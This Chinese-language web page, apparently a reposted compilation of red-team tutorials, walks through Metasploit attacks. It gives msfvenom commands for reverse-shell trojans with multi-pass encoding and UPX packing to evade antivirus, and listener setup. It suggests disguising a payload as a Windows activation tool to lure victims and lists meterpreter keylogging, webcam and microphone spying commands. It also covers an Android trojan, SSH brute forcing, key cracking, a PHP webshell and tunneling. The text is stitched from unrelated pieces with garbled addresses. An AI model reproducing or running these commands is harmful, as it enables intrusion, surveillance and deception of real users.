安全攻防实战系列MSF

安全攻防实战系列MSF,第1张

前言
在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。

环境配置
从虚拟机网络来看

机器描述

目录如下

蚁剑拿shell

msf免杀拿shell
使用msfvenom生成免杀木马payload,里面的IP和端口自行修改,就是反dshell的kali

使用分离免杀工具生成loaderexe文件

对生成的exe文件进行加壳免杀

免杀效果如下

免杀之后通过蚁剑上传到server-bt上

msf开启监听

蚁剑运行

getuid

ps

msf内网渗透
load mimikatz # 加载Mimikatz模块
成功开启了远程桌面,并且生成了一个txt文件,这个txt文件往后可用来关闭远程桌面,关闭命令
run multi_console_command -r /root/msf4/loot/xx_default_19216815_hostwindowscle_xxx5txt

绕过火绒添加用户
蚂蚁剑或者cs上传添加用户exe

远程登录server-bt

然后再添加一个由system权限下开启的桌面进程

Earthworm穿透
上传EW(Earthworm)到C:/ >一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制
二,工具:MSF
三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
四,过程:
1,查看帮助
命令: root# msfvenom -h
结果:
2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
结果:
3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是1921681113,端口设置成443所以最后连接会通向1921681113的443端口
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=1921681113 LPORT=443 -f exe > abcexe
注:如果只是用msfpayload生成,简单示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=1921681113 X > Desktop/abcexe
多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192168128129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acnexe
upx加壳:upx -5 /root/Desktop/acnexe
结果:
说明: -p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
4,把生成的abcexe放到win7下执行
5,在命令行下,打开msfconsole
命令: root # msfconsole
6,本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
结果:
7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来
8,验证

前言

最近整理了一些 奇安信&华为&深信服大佬 的课件资料+大厂面试课题,想要的可以私信自取, 无偿赠送 给粉丝朋友~

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode是用来生成后门的软件。

MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

演示环境

使用Kali 20213进行演示 *** 作

目标靶机: Win10专业版

软件:msfvenom、msfconsole(Kali系统内置)

1进入管理员模式

命令: sudo su

解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令

命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip> LPORT=本地端口号> –f exe –o 文件名>exe

解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址

本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性

文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩

当然MSF也可以用来渗透手机、mac、Linux等

接下来运行命令生成文件

默认生成的文件在根目录下

把刚才生成的文件放到目标靶机Win10系统中

命令: msfconsole

(1)命令: use exploit/multi/handler(选择模块)

(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)

(3)命令: set LhOST 192168321(填写自己主机的IP地址)

(4)命令: set lport 1111(填写刚才生成文件时的端口号)

(5)命令: show options(查看设置参数)

(6)命令: exploit -z -j(后台执行)

我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

(1)命令: sessions (查看上钩的用户)
(2)命令: sessions -i 1 (选择需要攻击的用户,这里选择第 1 个

命令: run vnc -i

cmd指令:

cat 读取文件内容到屏幕

cd 更改目录

checksum 检索文件的校验和

cp 将源复制到目标

del 删除指定文件

dir 列出文件(ls 的别名)

下载 下载文件或目录

编辑 编辑文件

getlwd 打印本地工作目录

getwd 打印工作目录

lcd 更改本地工作目录

lls 列出本地文件

lpwd 打印本地工作目录

ls 列出文件

mkdir 创建目录

mv 将源移动到目标

pwd 打印工作目录

rm 删除指定文件

rmdir 删除目录

search 搜索文件

show_mount 列出所有挂载点/逻辑驱动器

upload 上传文件或目录

pkill 按名称终止进程

keyscan_start 开始捕获击键(开始键盘记录)

keyscan_dump 转储按键缓冲(下载键盘记录)

keyscan_stop 停止捕获击键(停止键盘记录)

record_mic X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat 开始视频聊天(视频,对方会有d窗)

webcam_list 单摄像头(查看摄像头列表)

webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)

enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)

getdesktop 得到当前的Meterpreter桌面

reboot 重新启动远程计算机

shutdown 关闭远程计算机

shell 放入系统命令 shell

enumdesktops 列出所有可访问的桌面和窗口站

getdesktop 获取当前的meterpreter桌面

idletime 返回远程用户空闲的秒数

keyboard_send 发送击键

keyevent 发送按键事件

keyscan_dump 转储击键缓冲区

keyscan_start 开始捕获击键

keyscan_stop 停止捕获击键

mouse 发送鼠标事件

screenshare 实时观看远程用户桌面

screenshot 抓取交互式桌面的屏幕截图

setdesktop 更改 Meterpreters 当前桌面

uictl 控制一些用户界面组件

record_mic 从默认麦克风录制音频 X 秒

webcam_chat 开始视频聊天

webcam_list 列出网络摄像头

webcam_snap 从指定的网络摄像头拍摄快照

webcam_stream 播放来自指定网络摄像头的视频流

play 在目标系统上播放波形音频文件 (wav)

getsystem 尝试将您的权限提升到本地系统的权限

execute -f notepad 打开记事本

————————————————

原文链接:>渗透机:kali20173
靶机:安卓手机一部
首先我们需要生成一个安卓木马

至于木马的免杀暂且不谈。
然后打开msfconsole

然后执行

获取一个安卓手机的session,我们可以获取当前通话记录,聊天短信等信息

下面是我从网上找的一些参数的释义。

剩下的就自个慢慢玩吧,我就先撤了。。。。。。。

本人笔记,仅供参考

相关靶机:

链接:>

提取码:qd32

渗透分析:

对于开启ssh服务的22端口的靶场优先考虑

1暴力破解

2私钥泄露

对于开放>

1通过浏览器访问对应靶场>

2使用探测工具对>

挖掘敏感信息:

使用浏览器对靶场IP的>

尤其对robotstxt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa);

对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;

-- nikto -host靶场IP地址

特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;

登录服务器之后,我们需要做以下 *** 作。

1、查看当前用户whoami 

2、id 查看当前用户的权限

3、查看根目录寻找flag文件

如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一

般情况下,flag文件只属于root用户和对应的用户组:

cat /etc/passwd查看所有用户的列装

cat /etc/group查看用户组

find / -user用户名查看属于某些用户的文件

/tmp查看缓冲文件目录

深入挖掘

通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要roor权限。不同的用户都可以有不同的定时任务

cat /etc/crontab挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。

如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反dshell,然后netcat执行监听获取对应用户的权限。

如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。

万不得已的时候只能对ssh服务进行暴力破解。破解最后一个

用户名。破解工具如hydra、medusa等;

利用cupp创建字典

git clone >

chmod +x cupppy

/cupppy -i以交互的方式创建字典

输入用户名然后一直回车到Do you want to add some random numbers at the end of words输入yes其他全部no此时创建完成

之后推荐用metasploit破解ssh

在终端中输入

msfconsole

msf > use auxiliary/scaner/ssh/ssh_ login(使用该模块)

set rhosts  19216856103(确定ip地址)

set username 用户名(破解的用户名)

set pass_ file 用户名txt(刚刚创建的字典)

set threads  5(输入线程)

Run(进攻)

此时破解出密码例如123

直接连接,如果出现问题可以重启msfconsole,启用该模块后

set rhosts 19216856103             (连接远程主机)

set username hadi(用户名)

Set password 123(密码)

Run

界面简陋就使用python优化界面

Python -c “import pty;ptyspawn(‘/bin/bash’)”(优化界面)

此时可以把自己权限提升到root:

su - root

回到根目录ls打开flag文件

Ssh秘钥泄露

解密Ssh秘钥信息(以秘钥名id_isa举例)

Chmod  600 id_isa(赋予is_isa可读可写权限)

ssh2john id_isa > isacrack       (就是用ssh2john把秘钥里的东西转换成john可识别的)

Zcat  /usr/share/wordlists/rockyoutxtgz | john --pipe --rules rsacracks(利用rockyou字典解出所需要的东西)

制作webshell

msfvenom -p php/meterpreter/reverse_tcp Ihost=攻击机IP地址Iport=4444 -f raw > /root/Desktop/shellphp

启动监听

msf > use exploit/multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

Weoshell

msf exploit(handler) > set Ihost攻击机IP地址

msf exploit(handler) > set lport 4444

msf exploit(handler)> run

上传Webshell

使用找到的敏感信息登录系统后台,上传webshell。 执行

webshel(访问具有webshell的php页面)

获得反d的shell

--

wordpress上传点theme 404php

执行: >服务端frpsini只需配置默认端口,默认7000,可自行修改,要保证自己vps的端口开放且没被占用就好。

压缩包里有一个配置文件frpc_fullini,里面有很多代理格式,socks、ssh等都有。

这里是配置的socks5代理,frpcini:

服务端:/frps -c frpsini

客户端: frpcexe -c frpcini

现在喜欢直接从cs上把会话传给msf,简单快速。

cs上新建一个监听然后增加会话就行了。
socks5代理模块:

直接贴个图,很清晰。常用方式为上传到目标机器:


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zz/13489814.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-08-17
下一篇 2023-08-17

发表评论

登录后才能评论

评论列表(0条)